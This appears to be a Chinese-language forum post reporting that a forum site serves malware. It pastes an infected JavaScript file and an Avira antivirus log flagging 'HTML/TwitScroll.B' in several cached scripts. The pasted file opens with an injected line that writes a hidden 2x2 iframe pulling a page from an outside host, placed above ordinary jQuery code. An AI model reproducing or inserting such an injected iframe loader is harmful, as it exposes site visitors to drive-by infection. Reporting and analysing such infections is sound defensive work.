裏面

fireold

1. http://www.lei-forum.com/index.php?PHPSESSID=fb58d837d18efb440a71b38bfc1ee696

复制代码

1. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://brg-catalogues.com/mzcf.html?j=560663></iframe>');
   
2. 
   
3. $(document).ready(function() {
   
4.     $('stash').each(function(index) {
   
5.         this_ = $(this);
   
6.         stashify(this_, index);
   
7.     });
   
8. });
   
9. 
   
10. DEBUG = false;
    
11. 
    
12. function alertme(data) {
    
13.     if (DEBUG) alert(data);
    
14. }
    
15. 
    
16. function stashify(this_, index) {
    
17.     //tira o stash se for absoluto
    
18.     this_.text(this_.text().replace("stash/", ""));
    
19.     //se o var nao estiver aqui o scope fode tudo LOL
    
20.     var url = "stash/" + this_.text();
    
21. 
    
22.     alertme(index + ': ' + url);
    
23. 
    
24.     $.ajax({
    
25.         url: url,
    
26.         //      context: document.body
    
27.     }).success(function(data) {
    
28.         alertme(data);
    
29.         this_.text("");
    
30.         data = $(data);
    
31.         alertme($(data).find('a').html());
    
32.         $(data).find('a').each(function(index) {
    
33.             a_ = $(this);
    
34.             old = a_.attr("href");
    
35.             var new_url = url + "/" + old
    
36. 
    
37.             //remover '/' duplicadas/triplicadas etc
    
38.             while (new_url.indexOf("//") != -1)
    
39.             new_url = new_url.replace("//", "/");
    
40. 
    
41.             //se nao for link absoluto (tipo Parent Directory) logo nao tem '/'
    
42.             if (old.indexOf("stash") == -1) {
    
43.                 a_.attr("href", new_url);
    
44.             }
    
45.             //se for link absoluto capturar o click e
    
46.             //  fazer para updatar na mesma pagina para navegacao
    
47.             if (old.indexOf(".") == -1) {
    
48.                 a_.click(update_stash);
    
49.             }
    
50.         });
    
51.         this_.append($(data))
    
52.     });
    
53. }
    
54. 
    
55. function update_stash(e) {
    
56.     e.preventDefault();
    
57.     var url = $(this).attr("href");
    
58.     var outer_stash = $(this).closest('stash');
    
59.     outer_stash.text(url);
    
60.     //alert("hi"+url);
    
61.     stashify(outer_stash, 666);
    
62. }

复制代码

Avira

2013/9/7 上午 10:08 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        796
      目錄數：        0
      惡意程式碼數：        3
      警告數：        0

2013/9/7 上午 10:08 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\script[3].js'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作：
      檔案會移動至 '577526b0.qua' 名稱底下的隔離區目錄。.

2013/9/7 上午 10:08 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\sha1[1].js'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作：
      檔案會移動至 '4ff508ec.qua' 名稱底下的隔離區目錄。.

2013/9/7 上午 10:08 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\stash[1].js'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作：
      檔案會移動至 '1daa5210.qua' 名稱底下的隔離區目錄。.

2013/9/7 上午 10:08 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\index[1].htm'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作：
      發生錯誤，檔案未刪除。錯誤識別碼：26003.
      檔案無法刪除！.
      嘗試使用 ARK 程式庫執行動作。.
      檔案會移動至 '4ca732a4.qua' 名稱底下的隔離區目錄。.

2013/9/7 上午 10:08 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        794
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/9/7 上午 10:07 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\stash[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：傳輸至掃描程式

2013/9/7 上午 10:07 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\R8AOCKPW\sha1[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：傳輸至掃描程式

2013/9/7 上午 10:07 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\stash[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：拒絕存取

2013/9/7 上午 10:07 [Web Protection] 發現惡意程式碼
      從 URL "http://www.lei-forum.com/Sources/stash.js" 存取資料時，
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作：已略過

2013/9/7 上午 10:07 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\script[3].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：傳輸至掃描程式

2013/9/7 上午 10:07 [Web Protection] 發現惡意程式碼
      從 URL "http://lei-forum.com/Themes/default/sha1.js" 存取資料時，
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作：已略過

2013/9/7 上午 10:07 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\TIHYMAU3\script[3].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：拒絕存取

2013/9/7 上午 10:07 [Web Protection] 發現惡意程式碼
      從 URL "http://lei-forum.com/Themes/default/script.js?fin11" 存取資料時，
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作：已略過

2013/9/7 上午 10:07 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\AVC3APW1\index[1].htm 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：傳輸至掃描程式

2013/9/7 上午 10:07 [Web Protection] 發現惡意程式碼
      從 URL
      "http://www.lei-forum.com/index.php?PHPSESSID=fb58d837d18efb440a71b38bfc1ee696"
      存取資料時，
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作：已略過